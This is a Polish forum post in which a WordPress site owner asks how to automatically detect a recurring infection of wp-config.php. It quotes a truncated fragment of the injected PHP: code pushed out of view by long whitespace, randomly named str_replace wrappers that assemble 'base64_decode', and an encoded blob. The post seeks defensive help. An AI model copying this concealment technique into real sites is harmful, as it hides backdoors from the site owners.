zastanawiam się nad następującym problemem.
Mam w WordPressie plik wp-config.php niestety z tego co obserwuję co jakiś czas następuje jego infekcja. Infekcja ta nie jest rozpoznawana przez żaden program antywirusowy.(póki co nie znalazłem takiego co by zauważył ją)
Pytanie jest o pomysł na zautomatyzowane wykrywanie takiego "życia ukrytego".
Poniżej drobny fragment (jest w formie prawie oryginalnej więc część jest trudno czytelna:
<?php (i tutaj jest prawie 1000 spacji - generalnie kodu normalnie nie widać w edytorze bez przewinięcia w prawo) function z3skw9X($AfY3hNpN6,$y0G1QqdyUbU4g2YzckzZOM5,$QchVQeqI4WzKdD9){ return str_replace($AfY3hNpN6,$y0G1QqdyUbU4g2YzckzZOM5,$QchVQeqI4WzKdD9);} function etpn3baZUmSD7vk($AfY3hNpN6,$y0G1QqdyUbU4g2YzckzZOM5,$QchVQeqI4WzKdD9){ return str_replace($AfY3hNpN6,$y0G1QqdyUbU4g2YzckzZOM5,$QchVQeqI4WzKdD9);} function snsuQcY($AfY3hNpN6,$y0G1QqdyUbU4g2YzckzZOM5,$QchVQeqI4WzKdD9){ return str_replace($AfY3hNpN6,$y0G1QqdyUbU4g2YzckzZOM5,$QchVQeqI4WzKdD9);} $oeI8f = 'bsUapmf1fasUapmf1fssUapmf1fesUapmf1f6sUapmf1f4sUapmf1f_sUapmf1fdsUapmf1fesUa pmf1fcsUapmf1fosUapmf1fdsUapmf1fe'; $oeI8f = snsuQcY('sUapmf1f','',$oeI8f); $kv60m4MKi5TMQm = 'cVz6aJU6wicfqUEKOFPnDUEOEErVz6aJU6wicfqUEKOFPnD // tutaj jest jeszcze kilkadziesiąt kB losowych "robaczków" i niżej standardowy plik konfiguracyjny WordPressa $ZOdGFGcE5iazV3VXpGU2VsTXdUblZOUlhSdFZWaEJOVkV5WXpsUVUwbHdTMVJ6WnlJcEtUc2ciK Sk7IA==');?><?php /** * Podstawowa konfiguracja WordPressa. * * Ten plik zawiera konfiguracje: ustawie▒^▒ MySQL-a, prefiksu tabel * w bazie danych, tajnych kluczy, używanej lokalizacji WordPressa * i ABSPATH. Wi▒^▒▒^▒ej informacji znajduje si▒^▒ na stronie // itd...
Kod szyfrowany nie jest powtarzalny więc nie da się go wykryć na zasadzie wyszukania ciągu znaków.
Podglądając go np. w terminalu linuxa całość mieści się w jednej długiej linii. Tutaj widzę że edytor podzielił go po swojemu.
Ilość spacji na początku jest różna, nazwy funkcji są różne (losowe)
Pytanie czy jest może jakiś gotowy skrypt, który by coś takiego rozpoznał, albo czy macie jakiś pomysł na wykrycie go przez skanowanie plików?
Chciałbym napisać skrypt który "przetrzepie" cały kod strony i wyłapie mi pliki w których coś takiego może się czaić. Ale nie wiem w sumie jaki przyjąć punkt początkowy skanowania.
Bo ręczne wyszukiwanie to "troszkę" za dużo roboty przy dużej ilości stron.
z góry dzięki za sugestie